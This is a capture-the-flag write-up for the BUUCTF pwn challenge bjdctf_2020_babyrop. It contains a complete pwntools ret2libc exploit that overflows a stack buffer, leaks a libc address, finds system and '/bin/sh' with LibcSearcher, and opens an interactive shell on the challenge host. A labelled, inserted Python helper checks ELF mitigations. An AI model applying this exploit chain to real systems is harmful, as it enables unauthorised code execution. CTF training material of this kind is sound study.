[BUUCTF-pwn]——bjdctf_2020_babyrop
As usual, run checksec first.
Take a look at the binary in IDA.
Using the leaked address together with the LibcSearcher library, find the matching libc version; once the offsets are right you can locate the system function and the '/bin/sh' string.
Because the binary is 64-bit, the first argument is passed in rdi, so look for a pop rdi gadget.
Approach: leak the address of any libc function, identify the corresponding libc version, then use the offsets to find system and the '/bin/sh' string.
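The checksec step above, as an added example that is not part of the original writeup: a small Python parser that reports NX, PIE and RELRO status straight from the ELF64 program headers, the same properties the chain depends on (NX forces ROP instead of shellcode; no PIE is why pop_rdi and main_addr can be hard-coded). The sample ELF images are constructed inline and the function names are my own.

```python
import struct

# ELF constants (from the ELF64 specification / elf.h)
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X = 1
EHDR = "<16sHHIQQQIHHHHHH"   # 64-byte ELF64 file header
PHDR = "<IIQQQQQQ"           # 56-byte program header


def check_mitigations(data):
    """Return NX / PIE / RELRO status using only the ELF64 headers."""
    if data[:4] != b"\x7fELF" or data[4] != 2:
        raise ValueError("not an ELF64 file")
    (_, e_type, _, _, _, e_phoff, _, _, _,
     e_phentsize, e_phnum, _, _, _) = struct.unpack_from(EHDR, data, 0)
    nx, relro = False, False          # no PT_GNU_STACK means an executable stack
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True              # at least partial; full RELRO also needs DT_BIND_NOW
    # ET_DYN is also used by shared objects; for an executable it means PIE
    return {"nx": nx, "pie": e_type == ET_DYN, "relro": relro}


def build_elf(e_type, stack_flags, with_relro=False):
    """Constructed sample: a minimal ELF64 image carrying only the headers we parse."""
    phdrs = [(PT_GNU_STACK, stack_flags)]
    if with_relro:
        phdrs.append((PT_GNU_RELRO, 4))
    ehdr = struct.pack(EHDR, b"\x7fELF\x02\x01\x01" + b"\x00" * 9, e_type, 62, 1,
                       0x400000, 64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    body = b"".join(struct.pack(PHDR, t, f, 0, 0, 0, 0, 0, 0x10) for t, f in phdrs)
    return ehdr + body


if __name__ == "__main__":
    # Same profile the writeup relies on: NX enabled, no PIE (fixed gadget addresses)
    print(check_mitigations(build_elf(ET_EXEC, 6)))
    # A hardened build: PIE plus RELRO (stack flags 7 here show NX reported as off)
    print(check_mitigations(build_elf(ET_DYN, 7, with_relro=True)))
```

To run it on a real file, pass open(path, "rb").read() to check_mitigations.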
exploit
from pwn import *
from LibcSearcher import *

# p = process("./bjdctf_2020_babyrop")
p = remote('node3.buuoj.cn', 27183)
elf = ELF("./bjdctf_2020_babyrop")
context.log_level = 'debug'

read_plt = elf.plt['read']
read_got = elf.got['read']  # Leaking the address of puts works just as well
puts_plt = elf.plt['puts']
pop_rdi = 0x0400733    # pop rdi; ret gadget (no PIE, so the address is fixed)
main_addr = 0x04006AD  # return to main so a second payload can be sent

prompt = b"Pull up your sword and tell me u story!\n"

# Stage 1: overflow the 0x20-byte buffer plus saved rbp, call puts(read@got), return to main
payload = b'a' * (0x20 + 0x8) + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(main_addr)
p.sendlineafter(prompt, payload)
read_addr = u64(p.recvuntil(b'\n')[:-1].ljust(8, b'\x00'))
print(hex(read_addr))

# Stage 2: identify the libc from the leak, compute system and "/bin/sh", call system("/bin/sh")
libc = LibcSearcher("read", read_addr)
libc_base = read_addr - libc.dump("read")
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")
payload = b'a' * (0x20 + 0x8) + p64(pop_rdi) + p64(binsh) + p64(sys_addr)
p.sendlineafter(prompt, payload)
p.interactive()